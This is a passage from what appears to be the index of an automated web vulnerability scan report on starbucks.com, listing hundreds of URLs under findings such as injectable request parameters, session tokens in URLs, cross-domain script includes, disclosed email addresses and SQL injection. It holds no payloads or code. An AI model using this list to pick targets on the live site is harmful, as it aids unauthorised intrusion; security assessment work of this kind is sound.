2.263. http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream [name of an arbitrarily supplied request parameter]

2.264. http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream [name of an arbitrarily supplied request parameter]

2.265. http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

2.266. http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

2.267. http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream [name of an arbitrarily supplied request parameter]

2.268. http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream [name of an arbitrarily supplied request parameter]

2.269. http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

2.270. http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

2.271. http://www.starbucks.com/menu/food/salads/farmers-market-salad [name of an arbitrarily supplied request parameter]

2.272. http://www.starbucks.com/menu/food/salads/fruit-cup [name of an arbitrarily supplied request parameter]

2.273. http://www.starbucks.com/menu/food/salads/garden-pesto-salad [name of an arbitrarily supplied request parameter]

2.274. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad [name of an arbitrarily supplied request parameter]

2.275. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe [name of an arbitrarily supplied request parameter]

2.276. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich [name of an arbitrarily supplied request parameter]

2.277. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella [name of an arbitrarily supplied request parameter]

2.278. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini [name of an arbitrarily supplied request parameter]

2.279. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich [name of an arbitrarily supplied request parameter]

2.280. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich [name of an arbitrarily supplied request parameter]

2.281. http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait [name of an arbitrarily supplied request parameter]

2.282. http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait [name of an arbitrarily supplied request parameter]

2.283. http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait [name of an arbitrarily supplied request parameter]

2.284. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]

2.285. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

2.286. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]

2.287. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

2.288. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

2.289. http://www.starbucks.com/responsibility/community [name of an arbitrarily supplied request parameter]

2.290. http://www.starbucks.com/responsibility/community/community-service [name of an arbitrarily supplied request parameter]

2.291. http://www.starbucks.com/responsibility/community/ethos-water-fund [name of an arbitrarily supplied request parameter]

2.292. http://www.starbucks.com/responsibility/community/starbucks-foundation [name of an arbitrarily supplied request parameter]

2.293. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

2.294. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

2.295. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

2.296. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

2.297. http://www.starbucks.com/responsibility/diversity [name of an arbitrarily supplied request parameter]

2.298. http://www.starbucks.com/responsibility/diversity/suppliers [name of an arbitrarily supplied request parameter]

2.299. http://www.starbucks.com/responsibility/environment [name of an arbitrarily supplied request parameter]

2.300. http://www.starbucks.com/responsibility/environment/climate-change [name of an arbitrarily supplied request parameter]

2.301. http://www.starbucks.com/responsibility/environment/energy [name of an arbitrarily supplied request parameter]

2.302. http://www.starbucks.com/responsibility/environment/explore-green-store [name of an arbitrarily supplied request parameter]

2.303. http://www.starbucks.com/responsibility/environment/green-building [name of an arbitrarily supplied request parameter]

2.304. http://www.starbucks.com/responsibility/environment/recycling [name of an arbitrarily supplied request parameter]

2.305. http://www.starbucks.com/responsibility/environment/water [name of an arbitrarily supplied request parameter]

2.306. http://www.starbucks.com/responsibility/learn-more/goals-and-progress [name of an arbitrarily supplied request parameter]

2.307. http://www.starbucks.com/responsibility/learn-more/policies [name of an arbitrarily supplied request parameter]

2.308. http://www.starbucks.com/responsibility/learn-more/relationships [name of an arbitrarily supplied request parameter]

2.309. http://www.starbucks.com/responsibility/learn-more/shared-values-blog [name of an arbitrarily supplied request parameter]

2.310. http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet [name of an arbitrarily supplied request parameter]

2.311. http://www.starbucks.com/responsibility/sourcing [name of an arbitrarily supplied request parameter]

2.312. http://www.starbucks.com/responsibility/sourcing/cocoa [name of an arbitrarily supplied request parameter]

2.313. http://www.starbucks.com/responsibility/sourcing/coffee [name of an arbitrarily supplied request parameter]

2.314. http://www.starbucks.com/responsibility/sourcing/farmer-support [name of an arbitrarily supplied request parameter]

2.315. http://www.starbucks.com/responsibility/sourcing/store-products [name of an arbitrarily supplied request parameter]

2.316. http://www.starbucks.com/responsibility/sourcing/tea [name of an arbitrarily supplied request parameter]

2.317. http://www.starbucks.com/responsibility/wellness [name of an arbitrarily supplied request parameter]

2.318. http://www.starbucks.com/search [keywords parameter]

2.319. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]

2.320. http://www.starbucks.com/search/ [keywords parameter]

2.321. http://www.starbucks.com/search/ [name of an arbitrarily supplied request parameter]

2.322. http://www.starbucks.com/site-map [name of an arbitrarily supplied request parameter]

2.323. http://www.starbucks.com/smooth [name of an arbitrarily supplied request parameter]

2.324. http://www.starbucks.com/smooth/ [name of an arbitrarily supplied request parameter]

2.325. http://www.starbucks.com/store-locator [name of an arbitrarily supplied request parameter]

2.326. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]

2.327. https://www.starbucks.com/card/set-auto-reload [name of an arbitrarily supplied request parameter]

3. Session token in URL

3.1. http://www.starbucks.com/about-us

3.2. http://www.starbucks.com/about-us/company-information

3.3. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement

3.4. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use

3.5. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility

3.6. http://www.starbucks.com/about-us/company-information/product-advisories

3.7. http://www.starbucks.com/about-us/our-heritage

3.8. http://www.starbucks.com/site-map

4. Flash cross-domain policy

5. Cross-domain Referer leakage

5.1. http://www.starbucks.com/menu/catalog/nutrition

5.2. http://www.starbucks.com/menu/catalog/nutrition

5.3. http://www.starbucks.com/menu/catalog/nutrition

5.4. http://www.starbucks.com/search

5.5. http://www.starbucks.com/search

6. Cross-domain script include

6.1. http://www.starbucks.com/

6.2. http://www.starbucks.com/about-us

6.3. http://www.starbucks.com/about-us/company-information

6.4. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement

6.5. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use

6.6. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility

6.7. http://www.starbucks.com/about-us/company-information/product-advisories

6.8. http://www.starbucks.com/about-us/our-heritage

6.9. http://www.starbucks.com/business

6.10. http://www.starbucks.com/business/foodservice

6.11. http://www.starbucks.com/business/international-stores

6.12. http://www.starbucks.com/business/licensed-stores

6.13. http://www.starbucks.com/business/office-coffee

6.14. http://www.starbucks.com/career-center

6.15. http://www.starbucks.com/career-center/career-diversity

6.16. http://www.starbucks.com/career-center/career-diversity/partner-networks

6.17. http://www.starbucks.com/career-center/international-positions

6.18. http://www.starbucks.com/career-center/working-at-starbucks

6.19. http://www.starbucks.com/coffee

6.20. http://www.starbucks.com/coffee/learn

6.21. http://www.starbucks.com/coffee/learn/clover

6.22. http://www.starbucks.com/coffee/learn/flavors-in-your-cup

6.23. http://www.starbucks.com/coffee/starbucks-natural-fusions

6.24. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel

6.25. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon

6.26. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring

6.27. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla

6.28. http://www.starbucks.com/coffee/starbucks-reserve-coffee

6.29. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

6.30. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia

6.31. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java

6.32. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria

6.33. http://www.starbucks.com/coffee/via

6.34. http://www.starbucks.com/coffee/via/flavored-coffee

6.35. http://www.starbucks.com/coffee/via/instant-coffee

6.36. http://www.starbucks.com/coffee/whole-bean-coffee

6.37. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia

6.38. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific

6.39. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast

6.40. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast

6.41. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast

6.42. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america

6.43. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends

6.44. http://www.starbucks.com/coffeehouse

6.45. http://www.starbucks.com/coffeehouse/community

6.46. http://www.starbucks.com/coffeehouse/community/mystarbucksidea

6.47. http://www.starbucks.com/coffeehouse/entertainment

6.48. http://www.starbucks.com/coffeehouse/mobile-apps

6.49. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks

6.50. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile

6.51. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb

6.52. http://www.starbucks.com/coffeehouse/store-design

6.53. http://www.starbucks.com/coffeehouse/wireless-internet

6.54. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada

6.55. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network

6.56. http://www.starbucks.com/customer-service

6.57. http://www.starbucks.com/customer-service/contact

6.58. http://www.starbucks.com/customer-service/faqs/card

6.59. http://www.starbucks.com/customer-service/faqs/coffee

6.60. http://www.starbucks.com/customer-service/faqs/coffeehouse

6.61. http://www.starbucks.com/customer-service/faqs/menu

6.62. http://www.starbucks.com/customer-service/faqs/responsibility

6.63. http://www.starbucks.com/customer-service/faqs/shop

6.64. http://www.starbucks.com/menu

6.65. http://www.starbucks.com/menu/catalog/nutrition

6.66. http://www.starbucks.com/menu/drinks

6.67. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha

6.68. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha

6.69. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla

6.70. http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy

6.71. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy

6.72. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino

6.73. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot

6.74. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot

6.75. http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy

6.76. http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy

6.77. http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day

6.78. http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto

6.79. http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee

6.80. http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler

6.81. http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast

6.82. http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee

6.83. http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast

6.84. http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate

6.85. http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate

6.86. http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate

6.87. http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate

6.88. http://www.starbucks.com/menu/drinks/espresso/caffe-americano

6.89. http://www.starbucks.com/menu/drinks/espresso/caffe-latte

6.90. http://www.starbucks.com/menu/drinks/espresso/caffe-mocha

6.91. http://www.starbucks.com/menu/drinks/espresso/cappuccino

6.92. http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte

6.93. http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato

6.94. http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte

6.95. http://www.starbucks.com/menu/drinks/espresso/eggnog-latte

6.96. http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna

6.97. http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato

6.98. http://www.starbucks.com/menu/drinks/espresso/espresso-shot

6.99. http://www.starbucks.com/menu/drinks/espresso/flavored-latte

6.100. http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte

6.101. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano

6.102. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte

6.103. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha

6.104. http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato

6.105. http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte

6.106. http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte

6.107. http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte

6.108. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha

6.109. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha

6.110. http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte

6.111. http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte

6.112. http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha

6.113. http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha

6.114. http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha

6.115. http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha

6.116. http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte

6.117. http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato

6.118. http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte

6.119. http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte

6.120. http://www.starbucks.com/menu/drinks/espresso/toffee-mocha

6.121. http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha

6.122. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages

6.123. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee

6.124. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee

6.125. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage

6.126. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee

6.127. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee

6.128. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme

6.129. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee

6.130. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme

6.131. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee

6.132. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee

6.133. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee

6.134. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme

6.135. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee

6.136. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage

6.137. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme

6.138. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee

6.139. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee

6.140. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee

6.141. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee

6.142. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage

6.143. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage

6.144. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage

6.145. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage

6.146. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage

6.147. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage

6.148. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme

6.149. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage

6.150. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage

6.151. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme

6.152. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme

6.153. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee

6.154. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice

6.155. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice

6.156. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk

6.157. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk

6.158. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice

6.159. http://www.starbucks.com/menu/drinks/tazo-tea/awake

6.160. http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte

6.161. http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea

6.162. http://www.starbucks.com/menu/drinks/tazo-tea/calm

6.163. http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte

6.164. http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips

6.165. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey

6.166. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte

6.167. http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte

6.168. http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte

6.169. http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte

6.170. http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte

6.171. http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom

6.172. http://www.starbucks.com/menu/drinks/tazo-tea/passion

6.173. http://www.starbucks.com/menu/drinks/tazo-tea/refresh

6.174. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade

6.175. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea

6.176. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade

6.177. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea

6.178. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade

6.179. http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea

6.180. http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte

6.181. http://www.starbucks.com/menu/drinks/tazo-tea/zen

6.182. http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie

6.183. http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie

6.184. http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie

6.185. http://www.starbucks.com/menu/food

6.186. http://www.starbucks.com/menu/food/bakery/8-grain-roll

6.187. http://www.starbucks.com/menu/food/bakery/apple-bran-muffin

6.188. http://www.starbucks.com/menu/food/bakery/apple-fritter

6.189. http://www.starbucks.com/menu/food/bakery/asiago-bagel

6.190. http://www.starbucks.com/menu/food/bakery/banana-nut-loaf

6.191. http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut

6.192. http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar

6.193. http://www.starbucks.com/menu/food/bakery/blueberry-scone

6.194. http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin

6.195. http://www.starbucks.com/menu/food/bakery/butter-croissant

6.196. http://www.starbucks.com/menu/food/bakery/cheese-danish

6.197. http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie

6.198. http://www.starbucks.com/menu/food/bakery/chocolate-croissant

6.199. http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut

6.200. http://www.starbucks.com/menu/food/bakery/chonga-bagel

6.201. http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone

6.202. http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone

6.203. http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie

6.204. http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut

6.205. http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll

6.206. http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie

6.207. http://www.starbucks.com/menu/food/bakery/hawaiian-bagel

6.208. http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake

6.209. http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin

6.210. http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread

6.211. http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone

6.212. http://www.starbucks.com/menu/food/bakery/marble-pound-cake

6.213. http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar

6.214. http://www.starbucks.com/menu/food/bakery/morning-bun

6.215. http://www.starbucks.com/menu/food/bakery/multigrain-bagel

6.216. http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut

6.217. http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie

6.218. http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone

6.219. http://www.starbucks.com/menu/food/bakery/plain-bagel

6.220. http://www.starbucks.com/menu/food/bakery/pumpkin-bread

6.221. http://www.starbucks.com/menu/food/bakery/raspberry-scone

6.222. http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake

6.223. http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake

6.224. http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake

6.225. http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake

6.226. http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake

6.227. http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie

6.228. http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie

6.229. http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake

6.230. http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin

6.231. http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate

6.232. http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate

6.233. http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate

6.234. http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll

6.235. http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap

6.236. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar

6.237. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit

6.238. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts

6.239. http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin

6.240. http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin

6.241. http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal

6.242. http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich

6.243. http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream

6.244. http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream

6.245. http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream

6.246. http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream

6.247. http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream

6.248. http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream

6.249. http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream

6.250. http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream

6.251. http://www.starbucks.com/menu/food/salads/farmers-market-salad

6.252. http://www.starbucks.com/menu/food/salads/fruit-cup

6.253. http://www.starbucks.com/menu/food/salads/garden-pesto-salad

6.254. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad

6.255. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe

6.256. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich

6.257. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella

6.258. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini

6.259. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich

6.260. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich

6.261. http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait

6.262. http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait

6.263. http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait

6.264. http://www.starbucks.com/menu/nutrition

6.265. http://www.starbucks.com/menu/nutrition/20-under-200

6.266. http://www.starbucks.com/menu/nutrition/35-under-350

6.267. http://www.starbucks.com/responsibility

6.268. http://www.starbucks.com/responsibility/community

6.269. http://www.starbucks.com/responsibility/community/community-service

6.270. http://www.starbucks.com/responsibility/community/ethos-water-fund

6.271. http://www.starbucks.com/responsibility/community/starbucks-foundation

6.272. http://www.starbucks.com/responsibility/community/starbucks-red

6.273. http://www.starbucks.com/responsibility/community/youth-action

6.274. http://www.starbucks.com/responsibility/diversity

6.275. http://www.starbucks.com/responsibility/diversity/suppliers

6.276. http://www.starbucks.com/responsibility/environment

6.277. http://www.starbucks.com/responsibility/environment/climate-change

6.278. http://www.starbucks.com/responsibility/environment/energy

6.279. http://www.starbucks.com/responsibility/environment/explore-green-store

6.280. http://www.starbucks.com/responsibility/environment/green-building

6.281. http://www.starbucks.com/responsibility/environment/recycling

6.282. http://www.starbucks.com/responsibility/environment/water

6.283. http://www.starbucks.com/responsibility/learn-more/goals-and-progress

6.284. http://www.starbucks.com/responsibility/learn-more/policies

6.285. http://www.starbucks.com/responsibility/learn-more/relationships

6.286. http://www.starbucks.com/responsibility/learn-more/shared-values-blog

6.287. http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet

6.288. http://www.starbucks.com/responsibility/sourcing

6.289. http://www.starbucks.com/responsibility/sourcing/cocoa

6.290. http://www.starbucks.com/responsibility/sourcing/coffee

6.291. http://www.starbucks.com/responsibility/sourcing/farmer-support

6.292. http://www.starbucks.com/responsibility/sourcing/store-products

6.293. http://www.starbucks.com/responsibility/sourcing/tea

6.294. http://www.starbucks.com/responsibility/wellness

6.295. http://www.starbucks.com/search

6.296. http://www.starbucks.com/site-map

6.297. http://www.starbucks.com/smooth

6.298. http://www.starbucks.com/store-locator

6.299. http://www.starbucks.com/whats-new

6.300. https://www.starbucks.com/card/set-auto-reload

7. Email addresses disclosed

7.1. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use

7.2. http://www.starbucks.com/customer-service/faqs/card

7.3. http://www.starbucks.com/customer-service/faqs/coffeehouse

7.4. http://www.starbucks.com/customer-service/faqs/shop

7.5. http://www.starbucks.com/static/js/global.js

8. Robots.txt file

9. SSL certificate



1. SQL injection
